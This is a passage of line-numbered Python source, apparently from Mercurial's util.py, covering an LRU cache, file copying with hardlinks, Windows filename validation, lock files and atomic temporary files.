1308 1313 # Iterate in oldest-to-newest order, so the copy has the right ordering
1309 1314 for i in range(len(self._cache)):
1310 1315 result[n.key] = n.value
1311 1316 n = n.prev
1312 1317 return result
1313 1318
1314 1319 def _movetohead(self, node):
1315 1320 """Mark a node as the newest, making it the new head.
1316 1321
1317 1322 When a node is accessed, it becomes the freshest entry in the LRU
1318 1323 list, which is denoted by self._head.
1319 1324
1320 1325 Visually, let's make ``N`` the new head node (* denotes head):
1321 1326
1322 1327 previous/oldest <-> head <-> next/next newest
1323 1328
1324 1329 ----<->--- A* ---<->-----
1325 1330 | |
1326 1331 E <-> D <-> N <-> C <-> B
1327 1332
1328 1333 To:
1329 1334
1330 1335 ----<->--- N* ---<->-----
1331 1336 | |
1332 1337 E <-> D <-> C <-> B <-> A
1333 1338
1334 1339 This requires the following moves:
1335 1340
1336 1341 C.next = D (node.prev.next = node.next)
1337 1342 D.prev = C (node.next.prev = node.prev)
1338 1343 E.next = N (head.prev.next = node)
1339 1344 N.prev = E (node.prev = head.prev)
1340 1345 N.next = A (node.next = head)
1341 1346 A.prev = N (head.prev = node)
1342 1347 """
1343 1348 head = self._head
1344 1349 # C.next = D
1345 1350 node.prev.next = node.next
1346 1351 # D.prev = C
1347 1352 node.next.prev = node.prev
1348 1353 # N.prev = E
1349 1354 node.prev = head.prev
1350 1355 # N.next = A
1351 1356 # It is tempting to do just "head" here, however if node is
1352 1357 # adjacent to head, this will do bad things.
1353 1358 node.next = head.prev.next
1354 1359 # E.next = N
1355 1360 node.next.prev = node
1356 1361 # A.prev = N
1357 1362 node.prev.next = node
1358 1363
1359 1364 self._head = node
1360 1365
1361 1366 def _addcapacity(self):
1362 1367 """Add a node to the circular linked list.
1363 1368
1364 1369 The new node is inserted before the head node.
1365 1370 """
1366 1371 head = self._head
1367 1372 node = _lrucachenode()
1368 1373 head.prev.next = node
1369 1374 node.prev = head.prev
1370 1375 node.next = head
1371 1376 head.prev = node
1372 1377 self._size += 1
1373 1378 return node
1374 1379
1375 1380 def lrucachefunc(func):
1376 1381 '''cache most recent results of function calls'''
1377 1382 cache = {}
1378 1383 order = collections.deque()
1379 1384 if func.__code__.co_argcount == 1:
1380 1385 def f(arg):
1381 1386 if arg not in cache:
1382 1387 if len(cache) > 20:
1383 1388 del cache[order.popleft()]
1384 1389 cache[arg] = func(arg)
1385 1390 else:
1386 1391 order.remove(arg)
1387 1392 order.append(arg)
1388 1393 return cache[arg]
1389 1394 else:
1390 1395 def f(*args):
1391 1396 if args not in cache:
1392 1397 if len(cache) > 20:
1393 1398 del cache[order.popleft()]
1394 1399 cache[args] = func(*args)
1395 1400 else:
1396 1401 order.remove(args)
1397 1402 order.append(args)
1398 1403 return cache[args]
1399 1404
1400 1405 return f
1401 1406
1402 1407 class propertycache(object):
1403 1408 def __init__(self, func):
1404 1409 self.func = func
1405 1410 self.name = func.__name__
1406 1411 def __get__(self, obj, type=None):
1407 1412 result = self.func(obj)
1408 1413 self.cachevalue(obj, result)
1409 1414 return result
1410 1415
1411 1416 def cachevalue(self, obj, value):
1412 1417 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1413 1418 obj.__dict__[self.name] = value
1414 1419
1415 1420 def clearcachedproperty(obj, prop):
1416 1421 '''clear a cached property value, if one has been set'''
1417 1422 if prop in obj.__dict__:
1418 1423 del obj.__dict__[prop]
1419 1424
1420 1425 def increasingchunks(source, min=1024, max=65536):
1421 1426 '''return no less than min bytes per chunk while data remains,
1422 1427 doubling min after each chunk until it reaches max'''
1423 1428 def log2(x):
1424 1429 if not x:
1425 1430 return 0
1426 1431 i = 0
1427 1432 while x:
1428 1433 x >>= 1
1429 1434 i += 1
1430 1435 return i - 1
1431 1436
1432 1437 buf = []
1433 1438 blen = 0
1434 1439 for chunk in source:
1435 1440 buf.append(chunk)
1436 1441 blen += len(chunk)
1437 1442 if blen >= min:
1438 1443 if min < max:
1439 1444 min = min << 1
1440 1445 nmin = 1 << log2(blen)
1441 1446 if nmin > min:
1442 1447 min = nmin
1443 1448 if min > max:
1444 1449 min = max
1445 1450 yield ''.join(buf)
1446 1451 blen = 0
1447 1452 buf = []
1448 1453 if buf:
1449 1454 yield ''.join(buf)
1450 1455
1451 1456 def always(fn):
1452 1457 return True
1453 1458
1454 1459 def never(fn):
1455 1460 return False
1456 1461
1457 1462 def nogc(func):
1458 1463 """disable garbage collector
1459 1464
1460 1465 Python's garbage collector triggers a GC each time a certain number of
1461 1466 container objects (the number being defined by gc.get_threshold()) are
1462 1467 allocated even when marked not to be tracked by the collector. Tracking has
1463 1468 no effect on when GCs are triggered, only on what objects the GC looks
1464 1469 into. As a workaround, disable GC while building complex (huge)
1465 1470 containers.
1466 1471
1467 1472 This garbage collector issue have been fixed in 2.7. But it still affect
1468 1473 CPython's performance.
1469 1474 """
1470 1475 def wrapper(*args, **kwargs):
1471 1476 gcenabled = gc.isenabled()
1472 1477 gc.disable()
1473 1478 try:
1474 1479 return func(*args, **kwargs)
1475 1480 finally:
1476 1481 if gcenabled:
1477 1482 gc.enable()
1478 1483 return wrapper
1479 1484
1480 1485 if pycompat.ispypy:
1481 1486 # PyPy runs slower with gc disabled
1482 1487 nogc = lambda x: x
1483 1488
1484 1489 def pathto(root, n1, n2):
1485 1490 '''return the relative path from one place to another.
1486 1491 root should use os.sep to separate directories
1487 1492 n1 should use os.sep to separate directories
1488 1493 n2 should use "/" to separate directories
1489 1494 returns an os.sep-separated path.
1490 1495
1491 1496 If n1 is a relative path, it's assumed it's
1492 1497 relative to root.
1493 1498 n2 should always be relative to root.
1494 1499 '''
1495 1500 if not n1:
1496 1501 return localpath(n2)
1497 1502 if os.path.isabs(n1):
1498 1503 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1499 1504 return os.path.join(root, localpath(n2))
1500 1505 n2 = '/'.join((pconvert(root), n2))
1501 1506 a, b = splitpath(n1), n2.split('/')
1502 1507 a.reverse()
1503 1508 b.reverse()
1504 1509 while a and b and a[-1] == b[-1]:
1505 1510 a.pop()
1506 1511 b.pop()
1507 1512 b.reverse()
1508 1513 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1509 1514
1510 1515 # the location of data files matching the source code
1511 1516 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1512 1517 # executable version (py2exe) doesn't support __file__
1513 1518 datapath = os.path.dirname(pycompat.sysexecutable)
1514 1519 else:
1515 1520 datapath = os.path.dirname(pycompat.fsencode(__file__))
1516 1521
1517 1522 i18n.setdatapath(datapath)
1518 1523
1519 1524 def checksignature(func):
1520 1525 '''wrap a function with code to check for calling errors'''
1521 1526 def check(*args, **kwargs):
1522 1527 try:
1523 1528 return func(*args, **kwargs)
1524 1529 except TypeError:
1525 1530 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1526 1531 raise error.SignatureError
1527 1532 raise
1528 1533
1529 1534 return check
1530 1535
1531 1536 # a whilelist of known filesystems where hardlink works reliably
1532 1537 _hardlinkfswhitelist = {
1533 1538 'apfs',
1534 1539 'btrfs',
1535 1540 'ext2',
1536 1541 'ext3',
1537 1542 'ext4',
1538 1543 'hfs',
1539 1544 'jfs',
1540 1545 'NTFS',
1541 1546 'reiserfs',
1542 1547 'tmpfs',
1543 1548 'ufs',
1544 1549 'xfs',
1545 1550 'zfs',
1546 1551 }
1547 1552
1548 1553 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1549 1554 '''copy a file, preserving mode and optionally other stat info like
1550 1555 atime/mtime
1551 1556
1552 1557 checkambig argument is used with filestat, and is useful only if
1553 1558 destination file is guarded by any lock (e.g. repo.lock or
1554 1559 repo.wlock).
1555 1560
1556 1561 copystat and checkambig should be exclusive.
1557 1562 '''
1558 1563 assert not (copystat and checkambig)
1559 1564 oldstat = None
1560 1565 if os.path.lexists(dest):
1561 1566 if checkambig:
1562 1567 oldstat = checkambig and filestat.frompath(dest)
1563 1568 unlink(dest)
1564 1569 if hardlink:
1565 1570 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1566 1571 # unless we are confident that dest is on a whitelisted filesystem.
1567 1572 try:
1568 1573 fstype = getfstype(os.path.dirname(dest))
1569 1574 except OSError:
1570 1575 fstype = None
1571 1576 if fstype not in _hardlinkfswhitelist:
1572 1577 hardlink = False
1573 1578 if hardlink:
1574 1579 try:
1575 1580 oslink(src, dest)
1576 1581 return
1577 1582 except (IOError, OSError):
1578 1583 pass # fall back to normal copy
1579 1584 if os.path.islink(src):
1580 1585 os.symlink(os.readlink(src), dest)
1581 1586 # copytime is ignored for symlinks, but in general copytime isn't needed
1582 1587 # for them anyway
1583 1588 else:
1584 1589 try:
1585 1590 shutil.copyfile(src, dest)
1586 1591 if copystat:
1587 1592 # copystat also copies mode
1588 1593 shutil.copystat(src, dest)
1589 1594 else:
1590 1595 shutil.copymode(src, dest)
1591 1596 if oldstat and oldstat.stat:
1592 1597 newstat = filestat.frompath(dest)
1593 1598 if newstat.isambig(oldstat):
1594 1599 # stat of copied file is ambiguous to original one
1595 1600 advanced = (
1596 1601 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1597 1602 os.utime(dest, (advanced, advanced))
1598 1603 except shutil.Error as inst:
1599 1604 raise error.Abort(str(inst))
1600 1605
1601 1606 def copyfiles(src, dst, hardlink=None, progress=None):
1602 1607 """Copy a directory tree using hardlinks if possible."""
1603 1608 num = 0
1604 1609
1605 1610 def settopic():
1606 1611 if progress:
1607 1612 progress.topic = _('linking') if hardlink else _('copying')
1608 1613
1609 1614 if os.path.isdir(src):
1610 1615 if hardlink is None:
1611 1616 hardlink = (os.stat(src).st_dev ==
1612 1617 os.stat(os.path.dirname(dst)).st_dev)
1613 1618 settopic()
1614 1619 os.mkdir(dst)
1615 1620 for name, kind in listdir(src):
1616 1621 srcname = os.path.join(src, name)
1617 1622 dstname = os.path.join(dst, name)
1618 1623 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1619 1624 num += n
1620 1625 else:
1621 1626 if hardlink is None:
1622 1627 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1623 1628 os.stat(os.path.dirname(dst)).st_dev)
1624 1629 settopic()
1625 1630
1626 1631 if hardlink:
1627 1632 try:
1628 1633 oslink(src, dst)
1629 1634 except (IOError, OSError):
1630 1635 hardlink = False
1631 1636 shutil.copy(src, dst)
1632 1637 else:
1633 1638 shutil.copy(src, dst)
1634 1639 num += 1
1635 1640 if progress:
1636 1641 progress.increment()
1637 1642
1638 1643 return hardlink, num
1639 1644
1640 1645 _winreservednames = {
1641 1646 'con', 'prn', 'aux', 'nul',
1642 1647 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1643 1648 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1644 1649 }
1645 1650 _winreservedchars = ':*?"<>|'
1646 1651 def checkwinfilename(path):
1647 1652 r'''Check that the base-relative path is a valid filename on Windows.
1648 1653 Returns None if the path is ok, or a UI string describing the problem.
1649 1654
1650 1655 >>> checkwinfilename(b"just/a/normal/path")
1651 1656 >>> checkwinfilename(b"foo/bar/con.xml")
1652 1657 "filename contains 'con', which is reserved on Windows"
1653 1658 >>> checkwinfilename(b"foo/con.xml/bar")
1654 1659 "filename contains 'con', which is reserved on Windows"
1655 1660 >>> checkwinfilename(b"foo/bar/xml.con")
1656 1661 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1657 1662 "filename contains 'AUX', which is reserved on Windows"
1658 1663 >>> checkwinfilename(b"foo/bar/bla:.txt")
1659 1664 "filename contains ':', which is reserved on Windows"
1660 1665 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1661 1666 "filename contains '\\x07', which is invalid on Windows"
1662 1667 >>> checkwinfilename(b"foo/bar/bla ")
1663 1668 "filename ends with ' ', which is not allowed on Windows"
1664 1669 >>> checkwinfilename(b"../bar")
1665 1670 >>> checkwinfilename(b"foo\\")
1666 1671 "filename ends with '\\', which is invalid on Windows"
1667 1672 >>> checkwinfilename(b"foo\\/bar")
1668 1673 "directory name ends with '\\', which is invalid on Windows"
1669 1674 '''
1670 1675 if path.endswith('\\'):
1671 1676 return _("filename ends with '\\', which is invalid on Windows")
1672 1677 if '\\/' in path:
1673 1678 return _("directory name ends with '\\', which is invalid on Windows")
1674 1679 for n in path.replace('\\', '/').split('/'):
1675 1680 if not n:
1676 1681 continue
1677 1682 for c in _filenamebytestr(n):
1678 1683 if c in _winreservedchars:
1679 1684 return _("filename contains '%s', which is reserved "
1680 1685 "on Windows") % c
1681 1686 if ord(c) <= 31:
1682 1687 return _("filename contains '%s', which is invalid "
1683 1688 "on Windows") % stringutil.escapestr(c)
1684 1689 base = n.split('.')[0]
1685 1690 if base and base.lower() in _winreservednames:
1686 1691 return _("filename contains '%s', which is reserved "
1687 1692 "on Windows") % base
1688 1693 t = n[-1:]
1689 1694 if t in '. ' and n not in '..':
1690 1695 return _("filename ends with '%s', which is not allowed "
1691 1696 "on Windows") % t
1692 1697
1693 1698 if pycompat.iswindows:
1694 1699 checkosfilename = checkwinfilename
1695 1700 timer = time.clock
1696 1701 else:
1697 1702 checkosfilename = platform.checkosfilename
1698 1703 timer = time.time
1699 1704
1700 1705 if safehasattr(time, "perf_counter"):
1701 1706 timer = time.perf_counter
1702 1707
1703 1708 def makelock(info, pathname):
1704 1709 """Create a lock file atomically if possible
1705 1710
1706 1711 This may leave a stale lock file if symlink isn't supported and signal
1707 1712 interrupt is enabled.
1708 1713 """
1709 1714 try:
1710 1715 return os.symlink(info, pathname)
1711 1716 except OSError as why:
1712 1717 if why.errno == errno.EEXIST:
1713 1718 raise
1714 1719 except AttributeError: # no symlink in os
1715 1720 pass
1716 1721
1717 1722 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1718 1723 ld = os.open(pathname, flags)
1719 1724 os.write(ld, info)
1720 1725 os.close(ld)
1721 1726
1722 1727 def readlock(pathname):
1723 1728 try:
1724 1729 return os.readlink(pathname)
1725 1730 except OSError as why:
1726 1731 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1727 1732 raise
1728 1733 except AttributeError: # no symlink in os
1729 1734 pass
1730 1735 fp = posixfile(pathname, 'rb')
1731 1736 r = fp.read()
1732 1737 fp.close()
1733 1738 return r
1734 1739
1735 1740 def fstat(fp):
1736 1741 '''stat file object that may not have fileno method.'''
1737 1742 try:
1738 1743 return os.fstat(fp.fileno())
1739 1744 except AttributeError:
1740 1745 return os.stat(fp.name)
1741 1746
1742 1747 # File system features
1743 1748
1744 1749 def fscasesensitive(path):
1745 1750 """
1746 1751 Return true if the given path is on a case-sensitive filesystem
1747 1752
1748 1753 Requires a path (like /foo/.hg) ending with a foldable final
1749 1754 directory component.
1750 1755 """
1751 1756 s1 = os.lstat(path)
1752 1757 d, b = os.path.split(path)
1753 1758 b2 = b.upper()
1754 1759 if b == b2:
1755 1760 b2 = b.lower()
1756 1761 if b == b2:
1757 1762 return True # no evidence against case sensitivity
1758 1763 p2 = os.path.join(d, b2)
1759 1764 try:
1760 1765 s2 = os.lstat(p2)
1761 1766 if s2 == s1:
1762 1767 return False
1763 1768 return True
1764 1769 except OSError:
1765 1770 return True
1766 1771
1767 1772 try:
1768 1773 import re2
1769 1774 _re2 = None
1770 1775 except ImportError:
1771 1776 _re2 = False
1772 1777
1773 1778 class _re(object):
1774 1779 def _checkre2(self):
1775 1780 global _re2
1776 1781 try:
1777 1782 # check if match works, see issue3964
1778 1783 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1779 1784 except ImportError:
1780 1785 _re2 = False
1781 1786
1782 1787 def compile(self, pat, flags=0):
1783 1788 '''Compile a regular expression, using re2 if possible
1784 1789
1785 1790 For best performance, use only re2-compatible regexp features. The
1786 1791 only flags from the re module that are re2-compatible are
1787 1792 IGNORECASE and MULTILINE.'''
1788 1793 if _re2 is None:
1789 1794 self._checkre2()
1790 1795 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1791 1796 if flags & remod.IGNORECASE:
1792 1797 pat = '(?i)' + pat
1793 1798 if flags & remod.MULTILINE:
1794 1799 pat = '(?m)' + pat
1795 1800 try:
1796 1801 return re2.compile(pat)
1797 1802 except re2.error:
1798 1803 pass
1799 1804 return remod.compile(pat, flags)
1800 1805
1801 1806 @propertycache
1802 1807 def escape(self):
1803 1808 '''Return the version of escape corresponding to self.compile.
1804 1809
1805 1810 This is imperfect because whether re2 or re is used for a particular
1806 1811 function depends on the flags, etc, but it's the best we can do.
1807 1812 '''
1808 1813 global _re2
1809 1814 if _re2 is None:
1810 1815 self._checkre2()
1811 1816 if _re2:
1812 1817 return re2.escape
1813 1818 else:
1814 1819 return remod.escape
1815 1820
1816 1821 re = _re()
1817 1822
1818 1823 _fspathcache = {}
1819 1824 def fspath(name, root):
1820 1825 '''Get name in the case stored in the filesystem
1821 1826
1822 1827 The name should be relative to root, and be normcase-ed for efficiency.
1823 1828
1824 1829 Note that this function is unnecessary, and should not be
1825 1830 called, for case-sensitive filesystems (simply because it's expensive).
1826 1831
1827 1832 The root should be normcase-ed, too.
1828 1833 '''
1829 1834 def _makefspathcacheentry(dir):
1830 1835 return dict((normcase(n), n) for n in os.listdir(dir))
1831 1836
1832 1837 seps = pycompat.ossep
1833 1838 if pycompat.osaltsep:
1834 1839 seps = seps + pycompat.osaltsep
1835 1840 # Protect backslashes. This gets silly very quickly.
1836 1841 seps.replace('\\','\\\\')
1837 1842 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1838 1843 dir = os.path.normpath(root)
1839 1844 result = []
1840 1845 for part, sep in pattern.findall(name):
1841 1846 if sep:
1842 1847 result.append(sep)
1843 1848 continue
1844 1849
1845 1850 if dir not in _fspathcache:
1846 1851 _fspathcache[dir] = _makefspathcacheentry(dir)
1847 1852 contents = _fspathcache[dir]
1848 1853
1849 1854 found = contents.get(part)
1850 1855 if not found:
1851 1856 # retry "once per directory" per "dirstate.walk" which
1852 1857 # may take place for each patches of "hg qpush", for example
1853 1858 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1854 1859 found = contents.get(part)
1855 1860
1856 1861 result.append(found or part)
1857 1862 dir = os.path.join(dir, part)
1858 1863
1859 1864 return ''.join(result)
1860 1865
1861 1866 def checknlink(testfile):
1862 1867 '''check whether hardlink count reporting works properly'''
1863 1868
1864 1869 # testfile may be open, so we need a separate file for checking to
1865 1870 # work around issue2543 (or testfile may get lost on Samba shares)
1866 1871 f1, f2, fp = None, None, None
1867 1872 try:
1868 1873 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1869 1874 suffix='1~', dir=os.path.dirname(testfile))
1870 1875 os.close(fd)
1871 1876 f2 = '%s2~' % f1[:-2]
1872 1877
1873 1878 oslink(f1, f2)
1874 1879 # nlinks() may behave differently for files on Windows shares if
1875 1880 # the file is open.
1876 1881 fp = posixfile(f2)
1877 1882 return nlinks(f2) > 1
1878 1883 except OSError:
1879 1884 return False
1880 1885 finally:
1881 1886 if fp is not None:
1882 1887 fp.close()
1883 1888 for f in (f1, f2):
1884 1889 try:
1885 1890 if f is not None:
1886 1891 os.unlink(f)
1887 1892 except OSError:
1888 1893 pass
1889 1894
1890 1895 def endswithsep(path):
1891 1896 '''Check path ends with os.sep or os.altsep.'''
1892 1897 return (path.endswith(pycompat.ossep)
1893 1898 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1894 1899
1895 1900 def splitpath(path):
1896 1901 '''Split path by os.sep.
1897 1902 Note that this function does not use os.altsep because this is
1898 1903 an alternative of simple "xxx.split(os.sep)".
1899 1904 It is recommended to use os.path.normpath() before using this
1900 1905 function if need.'''
1901 1906 return path.split(pycompat.ossep)
1902 1907
1903 1908 def mktempcopy(name, emptyok=False, createmode=None):
1904 1909 """Create a temporary file with the same contents from name
1905 1910
1906 1911 The permission bits are copied from the original file.
1907 1912
1908 1913 If the temporary file is going to be truncated immediately, you
1909 1914 can use emptyok=True as an optimization.
1910 1915
1911 1916 Returns the name of the temporary file.
1912 1917 """
1913 1918 d, fn = os.path.split(name)
1914 1919 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1915 1920 os.close(fd)
1916 1921 # Temporary files are created with mode 0600, which is usually not
1917 1922 # what we want. If the original file already exists, just copy
1918 1923 # its mode. Otherwise, manually obey umask.
1919 1924 copymode(name, temp, createmode)
1920 1925 if emptyok:
1921 1926 return temp
1922 1927 try:
1923 1928 try:
1924 1929 ifp = posixfile(name, "rb")
1925 1930 except IOError as inst:
1926 1931 if inst.errno == errno.ENOENT:
1927 1932 return temp
1928 1933 if not getattr(inst, 'filename', None):
1929 1934 inst.filename = name
1930 1935 raise
1931 1936 ofp = posixfile(temp, "wb")
1932 1937 for chunk in filechunkiter(ifp):
1933 1938 ofp.write(chunk)
1934 1939 ifp.close()
1935 1940 ofp.close()
1936 1941 except: # re-raises
1937 1942 try:
1938 1943 os.unlink(temp)
1939 1944 except OSError:
1940 1945 pass
1941 1946 raise
1942 1947 return temp
1943 1948
1944 1949 class filestat(object):
1945 1950 """help to exactly detect change of a file
1946 1951
1947 1952 'stat' attribute is result of 'os.stat()' if specified 'path'
1948 1953 exists. Otherwise, it is None. This can avoid preparative
1949 1954 'exists()' examination on client side of this class.
1950 1955 """
1951 1956 def __init__(self, stat):
1952 1957 self.stat = stat
1953 1958
1954 1959 @classmethod
1955 1960 def frompath(cls, path):
1956 1961 try:
1957 1962 stat = os.stat(path)
1958 1963 except OSError as err:
1959 1964 if err.errno != errno.ENOENT:
1960 1965 raise
1961 1966 stat = None
1962 1967 return cls(stat)
1963 1968
1964 1969 @classmethod
1965 1970 def fromfp(cls, fp):
1966 1971 stat = os.fstat(fp.fileno())
1967 1972 return cls(stat)
1968 1973
1969 1974 __hash__ = object.__hash__
1970 1975
1971 1976 def __eq__(self, old):
1972 1977 try:
1973 1978 # if ambiguity between stat of new and old file is
1974 1979 # avoided, comparison of size, ctime and mtime is enough
1975 1980 # to exactly detect change of a file regardless of platform
1976 1981 return (self.stat.st_size == old.stat.st_size and
1977 1982 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1978 1983 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1979 1984 except AttributeError:
1980 1985 pass
1981 1986 try:
1982 1987 return self.stat is None and old.stat is None
1983 1988 except AttributeError:
1984 1989 return False
1985 1990
1986 1991 def isambig(self, old):
1987 1992 """Examine whether new (= self) stat is ambiguous against old one
1988 1993
1989 1994 "S[N]" below means stat of a file at N-th change:
1990 1995
1991 1996 - S[n-1].ctime < S[n].ctime: can detect change of a file
1992 1997 - S[n-1].ctime == S[n].ctime
1993 1998 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1994 1999 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1995 2000 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1996 2001 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1997 2002
1998 2003 Case (*2) above means that a file was changed twice or more at
1999 2004 same time in sec (= S[n-1].ctime), and comparison of timestamp
2000 2005 is ambiguous.
2001 2006
2002 2007 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2003 2008 timestamp is ambiguous".
2004 2009
2005 2010 But advancing mtime only in case (*2) doesn't work as
2006 2011 expected, because naturally advanced S[n].mtime in case (*1)
2007 2012 might be equal to manually advanced S[n-1 or earlier].mtime.
2008 2013
2009 2014 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2010 2015 treated as ambiguous regardless of mtime, to avoid overlooking
2011 2016 by confliction between such mtime.
2012 2017
2013 2018 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2014 2019 S[n].mtime", even if size of a file isn't changed.
2015 2020 """
2016 2021 try:
2017 2022 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2018 2023 except AttributeError:
2019 2024 return False
2020 2025
2021 2026 def avoidambig(self, path, old):
2022 2027 """Change file stat of specified path to avoid ambiguity
2023 2028
2024 2029 'old' should be previous filestat of 'path'.
2025 2030
2026 2031 This skips avoiding ambiguity, if a process doesn't have
2027 2032 appropriate privileges for 'path'. This returns False in this
2028 2033 case.
2029 2034
2030 2035 Otherwise, this returns True, as "ambiguity is avoided".
2031 2036 """
2032 2037 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2033 2038 try:
2034 2039 os.utime(path, (advanced, advanced))
2035 2040 except OSError as inst:
2036 2041 if inst.errno == errno.EPERM:
2037 2042 # utime() on the file created by another user causes EPERM,
2038 2043 # if a process doesn't have appropriate privileges
2039 2044 return False
2040 2045 raise
2041 2046 return True
2042 2047
2043 2048 def __ne__(self, other):
2044 2049 return not self == other
2045 2050
2046 2051 class atomictempfile(object):
2047 2052 '''writable file object that atomically updates a file
2048 2053
2049 2054 All writes will go to a temporary copy of the original file. Call
2050 2055 close() when you are done writing, and atomictempfile will rename
2051 2056 the temporary copy to the original name, making the changes
2052 2057 visible. If the object is destroyed without being closed, all your
2053 2058 writes are discarded.
2054 2059
2055 2060 checkambig argument of constructor is used with filestat, and is
2056 2061 useful only if target file is guarded by any lock (e.g. repo.lock
2057 2062 or repo.wlock).
2058 2063 '''
2059 2064 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2060 2065 self.__name = name # permanent name
2061 2066 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2062 2067 createmode=createmode)
2063 2068 self._fp = posixfile(self._tempname, mode)
2064 2069 self._checkambig = checkambig
2065 2070
2066 2071 # delegated methods
2067 2072 self.read = self._fp.read
2068 2073 self.write = self._fp.write
2069 2074 self.seek = self._fp.seek
2070 2075 self.tell = self._fp.tell
2071 2076 self.fileno = self._fp.fileno
2072 2077
2073 2078 def close(self):
2074 2079 if not self._fp.closed:
2075 2080 self._fp.close()
2076 2081 filename = localpath(self.__name)
2077 2082 oldstat = self._checkambig and filestat.frompath(filename)
2078 2083 if oldstat and oldstat.stat:
2079 2084 rename(self._tempname, filename)
2080 2085 newstat = filestat.frompath(filename)
2081 2086 if newstat.isambig(oldstat):
2082 2087 # stat of changed file is ambiguous to original one
2083 2088 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2084 2089 os.utime(filename, (advanced, advanced))
2085 2090 else:
2086 2091 rename(self._tempname, filename)
2087 2092
2088 2093 def discard(self):
2089 2094 if not self._fp.closed:
2090 2095 try:
2091 2096 os.unlink(self._tempname)
2092 2097 except OSError:
2093 2098 pass
2094 2099 self._fp.close()
2095 2100
2096 2101 def __del__(self):
2097 2102 if safehasattr(self, '_fp'): # constructor actually did something
2098 2103 self.discard()
2099 2104
2100 2105 def __enter__(self):
2101 2106 return self
2102 2107
2103 2108 def __exit__(self, exctype, excvalue, traceback):
2104 2109 if exctype is not None:
2105 2110 self.discard()
2106 2111 else:
2107 2112 self.close()
2108 2113
2109 2114 def unlinkpath(f, ignoremissing=False, rmdir=True):
2110 2115 """unlink and remove the directory if it is empty"""
2111 2116 if ignoremissing:
2112 2117 tryunlink(f)
2113 2118 else:
2114 2119 unlink(f)
2115 2120 if rmdir:
2116 2121 # try removing directories that might now be empty
2117 2122 try:
2118 2123 removedirs(os.path.dirname(f))
2119 2124 except OSError:
2120 2125 pass
2121 2126
2122 2127 def tryunlink(f):
2123 2128 """Attempt to remove a file, ignoring ENOENT errors."""
2124 2129 try:
2125 2130 unlink(f)
2126 2131 except OSError as e:
2127 2132 if e.errno != errno.ENOENT:
2128 2133 raise
2129 2134
2130 2135 def makedirs(name, mode=None, notindexed=False):
2131 2136 """recursive directory creation with parent mode inheritance
2132 2137
2133 2138 Newly created directories are marked as "not to be indexed by
2134 2139 the content indexing service", if ``notindexed`` is specified
2135 2140 for "write" mode access.
2136 2141 """
2137 2142 try:
2138 2143 makedir(name, notindexed)
2139 2144 except OSError as err:
2140 2145 if err.errno == errno.EEXIST:
2141 2146 return
2142 2147 if err.errno != errno.ENOENT or not name:
2143 2148 raise
2144 2149 parent = os.path.dirname(os.path.abspath(name))
2145 2150 if parent == name:
2146 2151 raise
2147 2152 makedirs(parent, mode, notindexed)
2148 2153 try:
2149 2154 makedir(name, notindexed)
2150 2155 except OSError as err:
2151 2156 # Catch EEXIST to handle races
2152 2157 if err.errno == errno.EEXIST:
2153 2158 return
2154 2159 raise
2155 2160 if mode is not None:
2156 2161 os.chmod(name, mode)
2157 2162
2158 2163 def readfile(path):
2159 2164 with open(path, 'rb') as fp:
2160 2165 return fp.read()
2161 2166
2162 2167 def writefile(path, text):
2163 2168 with open(path, 'wb') as fp:
2164 2169 fp.write(text)
2165 2170
2166 2171 def appendfile(path, text):
2167 2172 with open(path, 'ab') as fp:
2168 2173 fp.write(text)
2169 2174
2170 2175 class chunkbuffer(object):
2171 2176 """Allow arbitrary sized chunks of data to be efficiently read from an
2172 2177 iterator over chunks of arbitrary size."""
2173 2178
2174 2179 def __init__(self, in_iter):
2175 2180 """in_iter is the iterator that's iterating over the input chunks."""
2176 2181 def splitbig(chunks):
2177 2182 for chunk in chunks:
2178 2183 if len(chunk) > 2**20:
2179 2184 pos = 0
2180 2185 while pos < len(chunk):
2181 2186 end = pos + 2 ** 18
2182 2187 yield chunk[pos:end]
2183 2188 pos = end
2184 2189 else:
2185 2190 yield chunk
2186 2191 self.iter = splitbig(in_iter)
2187 2192 self._queue = collections.deque()
2188 2193 self._chunkoffset = 0
2189 2194
2190 2195 def read(self, l=None):
2191 2196 """Read L bytes of data from the iterator of chunks of data.
2192 2197 Returns less than L bytes if the iterator runs dry.
2193 2198
